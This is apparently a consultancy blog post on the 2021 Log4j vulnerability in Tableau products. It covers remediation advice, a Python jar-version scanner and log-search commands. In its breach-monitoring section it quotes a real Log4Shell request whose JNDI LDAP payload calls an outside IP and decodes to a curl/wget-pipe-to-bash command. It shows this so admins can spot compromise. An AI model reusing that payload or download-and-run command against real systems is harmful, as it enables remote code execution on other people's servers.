
Apache Log4j Vulnerability and Tableau

The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers.
(Last Updated: 15th Dec 2021 13:51 PM UTC)


Overview

On December 10th, 2021 our SecOps team became aware of a zero-day vulnerability in the Java library Log4j 2 that allows remote code execution on the host and, potentially, loss of control of the system. Log4j is a Java package used in many software applications for generating log files, and it is also used by Tableau.


Scope of vulnerability

Any software product that runs the Log4J2 package:

  • In version 2.15 and up the vulnerable behaviour is disabled by default, but it can still be enabled.
  • In all versions below 2.15 the vulnerable behaviour is enabled, and it must be disabled manually in the software's configuration if the package is not upgraded to version 2.15.
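The scope note above turns on which Log4j 2 version a host is actually running. The following is an added example written for this post (not Tableau's or The Information Lab's code) that inventories `log4j-core` jars under a directory tree and flags any whose version is below the 2.15 threshold the post states. It assumes the usual Maven-style file naming (`log4j-core-<version>.jar`) and falls back to the `Implementation-Version` entry in the jar's `META-INF/MANIFEST.MF`; the sample jars it creates in `demo_scan()` are constructed fixtures containing only a manifest.

```python
"""Inventory log4j-core jars and flag versions below a threshold.

Added example for this post; assumes Maven-style jar names and the
Implementation-Version manifest entry, and builds its own sample jars.
"""
import os
import re
import tempfile
import zipfile

# Threshold as stated in this post: the vulnerable behaviour is off by default from 2.15 up.
THRESHOLD = (2, 15, 0)

_NAME_RE = re.compile(r"^log4j-core-(\d+(?:\.\d+)*)\.jar$", re.IGNORECASE)
_MANIFEST_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); padded to three parts so tuples compare cleanly."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def jar_version(path):
    """Version from the file name, else from the manifest, else None."""
    m = _NAME_RE.match(os.path.basename(path))
    if m:
        return parse_version(m.group(1))
    try:
        with zipfile.ZipFile(path) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError, OSError):
        return None
    m = _MANIFEST_RE.search(manifest)
    return parse_version(m.group(1)) if m else None


def is_below_threshold(version, threshold=THRESHOLD):
    """Unknown versions are not flagged here; report them separately for manual review."""
    return version is not None and version < threshold


def scan_tree(root, threshold=THRESHOLD):
    """Walk root and return (path, version, flagged) for every log4j-core jar found."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if not (lower.startswith("log4j-core") and lower.endswith(".jar")):
                continue
            path = os.path.join(dirpath, name)
            version = jar_version(path)
            results.append((path, version, is_below_threshold(version, threshold)))
    return results


def make_sample_jar(path, version):
    """Constructed fixture: a zip holding only a manifest, standing in for a real jar."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)


def demo_scan():
    """Build two constructed jars in a temp dir and return {file name: (version, flagged)}."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1")  # name carries version
        make_sample_jar(os.path.join(tmp, "log4j-core.jar"), "2.15.0")         # manifest fallback
        return {os.path.basename(p): (v, flagged) for p, v, flagged in scan_tree(tmp)}


if __name__ == "__main__":
    for name, (version, flagged) in sorted(demo_scan().items()):
        shown = ".".join(map(str, version)) if version else "unknown"
        print("%-5s %-8s %s" % ("FLAG" if flagged else "ok", shown, name))
```

Run it against the installation root of a Java application to get a per-jar list; anything reported as `unknown` was neither named nor labelled in the expected way and should be checked by hand.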


Impacted products

  • Tableau Online
  • Tableau Server 
  • Tableau Desktop
  • Tableau Prep
  • Tableau Bridge


Recommended actions


Official announcements

Monitor official announcements from Tableau/Salesforce on this page: https://status.salesforce.com/generalmessages/826


Tableau Server: Internet facing

We recommend restricting access to these servers from the internet until a patch is made available by Tableau. Discuss further risks of targeted or chained attacks from within your trusted network with your security operations team. Upgrade your environment as soon as Tableau releases a patch.


Tableau Server: Non-internet facing

We recommend monitoring your network and discussing further risks with your security operations team. Your server could be vulnerable to targeted and chained attacks if an attack can be launched from within your trusted network. Upgrade your environment as soon as Tableau releases a patch.


Tableau Online

As Tableau Online is a SaaS solution, we recommend monitoring the official announcements from Tableau/Salesforce on this, as they will take the necessary steps to keep the environment safe.


Tableau Desktop

We recommend upgrading as soon as Tableau releases a patch and being vigilant when opening untrusted workbooks.


Tableau Prep

We recommend upgrading as soon as Tableau releases a patch and being vigilant when opening untrusted files.


Tableau Bridge

We recommend upgrading as soon as Tableau releases a patch.


Monitoring for breaches

Please note that we cannot guarantee that the following commands will find all breaches, as the attacks are still evolving, nor can we guarantee that all breaches found are malicious (they might be scans from security tools). Please consult with your security operations team for guidance.

You can scan your Tableau Server logfiles for potential breaches using the following commands:

Windows

findstr /S /L /M /I /C:"jndi" "C:\ProgramData\Tableau\Tableau Server\data\tabsvc\logs\*.log"

Linux

grep 'jndi:' --include='*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs

Responses will look similar to the following:

"GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy4zNi4yMC4yMDk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuMzYuMjAuMjA5OjgwKXxiYXNo} HTTP/1.1"

Base64-decoding the string in the above GET request reveals a genuine exploit attempt to run commands through bash on the server:

(curl -s <ip>:5874/<ip>:80||wget -q -O- <ip>:5874/<ip>:80)|bash

Note: We've masked the actual IPs with <ip> in the above example.

If you find results, we recommend shutting down the server and restoring a known-good backup into a new, clean environment.


Frequently asked questions


Has The Information Lab been vulnerable?

A small number of our internal services were found to be vulnerable, and we immediately restricted access until patches become available. We have investigated our services to ensure that no malicious action was taken and have found no indicators. We remain vigilant on our environment as always.


The Information Lab hosts Tableau Server for us on AWS – what actions are you taking?

We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. We have also enabled the AWS WAF mitigation described above. 

Once a patch is released we will be coordinating an upgrade programme with all our hosted customers to migrate them to the new version as soon as possible. We deploy using a blue/green approach, so we will spin up new infrastructure from scratch, restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure.


What about The Information Lab Tableau Extensions?

None of the open-source products we offer through our GitHub page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected. The hosting provider we use does not use any Java products for logging.


Tableau will release a maintenance patch with a fix – what can I do to prepare?

When a maintenance release with a fix becomes available it is important to make sure you’re in a good position to safely deploy the update in your environments. Tableau have a useful process map for Preparing for an Upgrade and details on how to perform the upgrade itself can be found here.


How to get more support

If you purchase your Tableau or Alteryx licences from The Information Lab, you can log a support ticket using our support service. If you do not know how to contact our support services please contact your account manager.

Please note that this document will be the primary source of general information for Log4J issues, but please feel free to log a ticket if you have something specific that you would like to ask.

You can additionally raise tickets with Tableau directly using the following link:

https://www.tableau.com/support/case


What about Alteryx Server?

Alteryx does not use Log4J and is therefore not vulnerable.


Further information and reading

Comprehensive Log4J resource: 

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

Log4J Issue Tracking

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

Log4J Issue Explained: https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/ 

Our friends at Interworks have published a blog on the subject


Legal Disclaimer 

1. No liability for any errors or omissions

The information contained in this Blog has been provided by The Information Lab for information purposes only. This information does not constitute legal, professional or commercial advice. While every care has been taken to ensure that the content is useful and accurate, The Information Lab gives no guarantees, undertakings or warranties in this regard, and does not accept any legal liability or responsibility for the content or the accuracy of the information so provided, or, for any loss or damage caused arising directly or indirectly in connection with reliance on the use of such information. Any errors or omissions brought to the attention of The Information Lab will be corrected as soon as possible.

The information in this Blog may contain technical inaccuracies and typographical errors. The information in this Blog may be updated from time to time and may at times be out of date.  The Information Lab accepts no responsibility for keeping the information in this website up to date or any liability whatsoever for any failure to do so.

2. Material on this blog does not constitute legal and/or professional advice

Any views, opinions and guidance set out in this website are provided for information purposes only, and do not purport to be legal and/or professional advice or a definitive interpretation of any law. Anyone contemplating action in respect of matters set out in this website should obtain advice from a suitably qualified professional adviser based on their unique requirements.

3. No Warranty or Endorsement

The Information Lab does not make any warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, nor does it assume any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, nor does it represent that its use would not infringe privately owned rights.

4. No responsibility for other websites

When you access other external websites through a link from the website of The Information Lab, please note that The Information Lab has no control over the content on external websites. The links to external websites are provided as a matter of convenience only, and should not be taken as an endorsement by The Information Lab of the contents or practices of those external websites, for which The Information Lab assumes no responsibility or liability.

Jonathan Allenby

London, UK
